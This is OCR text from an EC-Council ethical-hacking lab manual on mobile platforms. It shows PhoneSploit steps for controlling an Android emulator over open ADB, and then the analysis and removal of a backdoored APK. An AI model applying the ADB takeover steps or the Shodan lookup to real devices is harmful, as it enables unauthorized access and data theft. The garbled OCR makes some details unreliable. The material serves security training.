(eH Lab Manual Page 593, Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 31 ‘lick Places in the top section of the Desktop; then, from the contest menu, click Desktop. 32. You should see the downloaded screenshot of the targeted Android device (screen.png). Double-click it if you wish to view the screenshot 2 Donna soneebt ofthe tet dice 33. Close the Desktop window and switch back to the Terminal window. 34. Ar the main menu prompt, type 44 and press Enter to choose List al on a phone. PPS 35. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.44) and press Enter. 36. The result appears, displaying the installed apps on the target Android device, as shown in the screenshot. Note: using this information, you can use other PhoneSploit options to either launch or uninstall any of the installed apps. Fee 1413 Altbeappeon he tinge ected (CeH Lab Manual Page 1504 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 37, Now, at the main_menu prompt, type 45 and press Enter to choose Rum an app. In this example, we will hunch a calculator app on the target Android device. ‘Note: Based on the information obtained in the previous step about the installed applications, you can launch any app of your choice. 38. When prompted to Enter a device name, type the target Android device’s IP address (ia this case, 10.10.10.44) and press Enter. 39. To launch the calculator app, type Com-android.caleulator2 and press Enter. 40. Afier launching the calculator app on the target Android device, switch to the Android virtual machine. 41. You will see that the calculator app is running, and that random values have been entered, as shown in the screenshot. Note: ‘The entered values might differ in your lab environment log(\.%6-x| ge L418 Caletor pp suming othe as device (CoH Lab Manual Page 1505 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms 42. Switch back to the Parret Seeurity virtual machine. In the Terminal window, type p and press Enter to navigate to additional PhoneSploit options on the Next Page. 43. The result appears, displaying additional PhoneSploit options, as shown in the screenshot. 44. AC the main_menu prompt, (ype 18 and press Enter 10 choose Show Maciinet information for the target Android device 45. Whea prompted to Enter a device name, type the target Andeoid device's IP address (n this case, 10.40.40.44) and press Enter. 46. Now, at the main menu prompt, type 21 and press Enter to choose the NetStat option. 47. When prompted to Enter a device name, type the target Andeoid device's IP address (in this case, 10.10.10.44) and press Enter. 48. The result appears, displaying netstat information of the target Android device, as shown in the sereenshot. (eH Lab Manual Page 596 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms Foe LA 1K Nett ination of th wnt vce Younha Note: For demonstration pusposcs, ia this task, we are exploiting the Android aha: Aalst emulator virtual machine. However, in real life, attackers use the Shadan search the /snewatsco) engine to find ADB-coabled devices and exploit them to gain scasitive dose pa information and carry out malicious activities, wenn) aANTI haps//woczimpesim. 49. In the same way, you can exploit the target Android device further by cae choosing other PhoneSploit options such as install an apk on a phone, eu) and Droid Screen record a phone, Tum The Device off, and Uninstall an app. bietashoddbue: 50. ‘This concludes the demonstration of how to exploit the Android platform through ADB using PhoneSploit. 51. Document all the acquired information and close all open windows. 52. ‘Turn off the Parrot Seeurity and Android emulator virtual machines. Lab Analysis Analyze-and document the results related to this lab exercise. Give your opinion about Meret Wes ONo Platform Supported EZ Classroom BiLabs CEH Lab Manual Page 3597 Ethical Hacking and Countermeasures Copy © by EE Commel ‘Al RightsReserved. Reproduction Sve Profits.© Vatuable Iaformation 7 Vest Your Knowledge BA Web Exerc DB Workbook Re (CoH Lab Manual Page 1508 Module 17 - Hacking Mobile Platforms Secure Android Devices using Various Android Security Tools Ethical backers and penetration testers are aided in securing Android device by various ‘oos for asessing and enbancing their security features. Lab Scenario Like personal computers, mobile devices store scnsitive data and are susceptible to various threats. ‘Therefore, they should be properly secured in order to prevent the compromise or loss of confidential data, lessen the risk of various threats such as viruses and Trojans, and mitigate other forms of abuse. Strict measures and security tools are vital to strengthening the security of these devices. Android’s growing popularity has led to increased security threats, ranging from typical malware to advanced phishing and identity theft techniques. As a professional ethical hacker or penetration tester, you should scan for any unsecured settings on the mobile device you are assessing, and then take appropriate action to secure them. You must do this before hackers exploit these vulnerabilities by; for example, downloading sensitive data, committing a crime using your Android device as a launchpad, and ultimately endangering your business. ‘There are various security tools available for scanning, detecting, and assessing the vulnerabilitics and security status of Android devices. Many security software companies have launched their own apps, including several complete security suites with antitheft capabilities. ‘The tasks in this lab will assist you in performing a security assessment of a target Android device. Lab Objectives Analyze a malicious app using online Android analyzers Analyze a malicious app using Quixsi vulnerability scanner © Secure Android devices from malicious apps using Malwarebytes Security Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.& Tools demonstrated in this lab are available in EACEH- ToolsiCEHvt1 Module 17 Hacking Mobile Platforms = TASK Module 17 - Hacking Mobile Platforms Lab Environment To carry out this lab, you need: © Windows 10 virtual machine © Parrot Security virtual machine * Android emulator running on a virtual machine Web browsers with an Intemet connection = Adm ‘steator privileges to run the tools Lab Duration ime: 30 Minutes Overview of Android Security Tools Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. ‘These tools automate the process of accurate Android platform security assessment. Lab Tasks Analyze a Malicious App using Online Android Analyzers Grasm 4 Analyze APK File using Sixo Online ‘APK Analyzer (CoH Lab Manual Page 1509 In this task, we will analyze a malicious app using various online Android analyzers. Note: In this lab, we will be analyzing the malicious file (Backdoor.apk), which ‘we used in the previous lab to hack the target Android platform Note: If the malicious file (Baekdoor.apk) is missing then follow the steps given in Lab 1 Task 1 (Hack an Android Device by Creating Binary Payloads using Jarrot Security) to re-create the file 1, Turn on the Android virtual machine and click the Geogle Chrome broweericon MD) on te Home eroan io lunch Chrome, 2. In Chrome, type httpsiiwww.sisik.eu/apk-tool in the address bar and press Enter. Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 3. ‘The Sixe Online APK Analyzer webpage loads, as shown in the screenshot, Note: If a cookie notification pop-up appears, click Get itt © Oiine Andis 4. Click the Drap APK here or click to select file field to upload an APK. aralyeesallow yout A veer file from the device. ackagesand atm | Note: Sixo Online APK Analyzer allows you to analyze various details about unzabilic wpancukr Android APK files. It can decompile binary XML. files and resources. App Some tse one Am anaes re ‘Sao Online APK lo ¢ > 0 [a ‘Aly, DeChaal and AVC UD sisik Sixo Online APK Analyzer Drop APK here or elick to select fle Fag 213-Sa0 Onine APK Ander epee 5. In the Cheose an action pop-up, click Files. camera Fig 212: Cranes atin pp (cen tab Manus Page 1600 Ethical Hacking and Countermeasures Copyigh © by EE-Counell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 6. ‘The Downloads screen appears; double-click the app_backdoored.apk file Note: If you find yourself in a folder called Recent_navigate to the Downloads folder by clicking on the hamburger icon (EESi)in the top-left corner, ge 213 Danek pbc apk le 7. ‘The browser window reappears with the information about the uploaded file (Backdoored.apk), as shown in the screenshot. Savers (CoH Lab Manual Page 1601 — MainActivity Pacagename ig 214 left ont the pad 8. Scroll down to the Requested Permissions section to view information regarding the app’s requested permissions. ‘Note: When an app wants to access resources of various device capabilities, it typically must request permission from the user to do so. Some permissions are granted by the user when installing the app and some need to be Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms confirmed later while the app is running, The requested permissions are declared in the app’s AndroidManifest.xml Ei Requested Permissions pre 218 Requested Penni eson 9. Scroll down to the AndroidManifest.xml section, which consists of essential information about the APK file, Note: ‘The manifest file contains important information about the app that is used by development tools, the Android system, and app stores. It contains the app’s package name, version information, declarations of app components, requested permissions, and other important data. Itis serialized into a binary XMI. format and bundled inside the app’s APK file. (CoH Lab Manat Page 1602 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms AndroidManifestxmt Figae 26 AndoddMifatd wen 10. You can also scroll down to view information about the app’s APK. Signature, App Source Code, cic. 11. Now, we shall analyze the malicious app using the tool: AVC UnDroid. 12, Press 6trl+T to open a new tab, type httpsiiundroid.av- comparatives.org! in the address bar, and press Enter. 13. ‘The AVG UnDrold website loads; click Select APK.. AVC UnDroid [beta] oa Figure 21.7: AVG Uni webite 14, In the Choose an action pop-up, click Files 15, In the Downloads screen, double-click app_backdoored.apk. 16. The selected file analysis button tc pp_backdoored.apk) is now listed; click Start analyze the sclected APK file. (eH Lab Manual Page 603 Ethical Macking and Countermeasures Copyright © by E-Soumell ‘Al RightsReserved. Reproduction Sve Profits.Module 17 - Hacking Mobile Platforms Note: AVC UnDroid is an online Android analyzer that provides statie analysis of Android apps. SST Se vomper a AVC UnDroid [beta] Oe ‘ure 214 Andie the uo le 17. AVG Unbrold initializes the analysis of the selected APK file. On completion, the Report appears, displaying detailed information about the APK file, as shown in the screenshot 18. The Report section displays information such as MD5, file size, filename, etc SHAI, SHA256, © > 6 wnenavcmpraneta AVC UnDroid [beta] Oe D tent Figare 219: AVC UnDea arai poet (CoH Lab Manat Page 1608 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 19. Scroll down to view information regarding Requested Permissions, Responsible API calls for used Permissions, Potentially dangerous Calls, and more > Oo remanent 2 NY TEEN Youeanako we aber online Ando salyaers suchas SandDrod (ipsa sere Googe Py a Samnbrenm eg + Boome Foryou Topetars Care Sto Chien Fam ay acs Recommended for you > BD Moves — S E2 Oo tom ses Suogested or you Be 2®@ yu 252 Laumeing Gon Pay 3. In the Search for apps & games ficld, type malwarebytes. Irom the results, click Malwarebytes Security, as shown in the screenshot. = Temerel] arebytes Security: Vitus Cleanet, malwarebytes -malwarebytes antivirus smalwarebytes app smalwacebytesanthmalware app malwarebytes fee pe 238 Sing fo Mawacats Sent Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 4. The Malwarebytes Security: Virus Cleaner, Anti-Malware app information is displayed; click the Install button to start the installation of the app. Malwarebytes: DE ciconer EEN aoe Malweagpbytes = oe " — {gn 234 ling bares Soucy 9p 5, Once installation completes, click the Open button to launch it. Malwarebytes Security: Virus Cleaner, Anti-Malware Malwarebytes lap purchases coe fom ® This app may not be optimized for your device pe 236i Matos Susy (CoH Lab Manat Page 1612 Ethical Macking and Countermeasures Copyright © by E-Soumell "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 6, Malwarebytes Security initializes. A Let's get you started message appears; click the Get started bution to proceed. gue 2 fe Mabands Getta 7. Inthe permissions window, click Give permission. Regma Minty 8. Assystem pop-up appears asking for permission; click ALLOW. Allow Malwarebytes to access photos, media, and files on your device? Fg 23 Pei tein (CoH Lab Manat Page 1613 Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.[Module 17 - Hacking Mobile Platforms 9. On the next sereen, click the Start Premium trial button to start the free premium trial version of Malwarebytes Security. gee 210 Stig thee Prin 10. The Your device is safe screen loads; click the Seam new button to start scanning the system. Your device is safe ype 2810 Bag thes (CoH Lab Manual Page 1614 Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.[Module 17 - Hacking Mobile Platforms -curity scan, as shown in the screenshot. 11. Malwarebytes Security beyins 1 s ‘gw 23.11 Semin a progess 12, After the completion of the scan, Sean finished message appears, click View sean results to sce the results. Scan finished 100% Fig 2512:Sean iad (CoH Lab Manat Page 1615 Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.Module 17 - Hacking Mobile Platforms 13. A Threats screen appears. This will show you all the malware Gf any) found ‘on your device. ‘Note: Here, the malware found is the malicious file Backdoor.apk. 14, Click the Remove selected button to remove the detected malware from. your device. ES Task Remove Malware gm 23.18 Renee 15. A conflemation pop-up appears; click OK to confirm the removal of the malware. 16, The Malwarebytes Seanner screen appears, notifying you that All items have been dealt witht. gm 2314 Scone src 17. Click Sean after update in the lower section of the Scanner window under Previous seans (0 view details of the scan. Ethical Hacking and Countermessures Copyright © by EC-Coumel (CoH Lab Manat Page 1616 "Al RightsReserved, Reproducton fs Stcty Prose.[Module 17 - Hacking Mobile Platforms (uape/ lays), iAmNouiied- Anti Spy ‘System (hep /iamnotif ev), (CoH Lab Manual Page 1617 fipae 28.15 Sean mals 18, ‘The Seanning history screen appears, displaying the deleted malicious file, as shown in the sereeashot. Cente Ma Cn] ‘Android/PUP.Hacktool Meta /mntisdcard/DovinicadBackdoocapk: Deleted gn Seam ht 19, This concludes the demonstration of how to sccure Android devices from malicious apps using Malwarebytes Securit. 20. Close all open windows and document all the acquired information. 21. Turn off the Android emulator view machine. Lab Analysis Analyze and document all the results discovered in the lab exercise. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS ‘ABOUT THIS LAB. er fe Ayes ONo Platform Supported © Classroom HiLabs Ethical Hacking and Countermessures Copyright © by EC-Coumel "Al RightsReserved, Reproducton fs Stcty Prose.ea qi ay Certified Ethical Hocker EC-COUNCIL OFFICIAL CURRICULA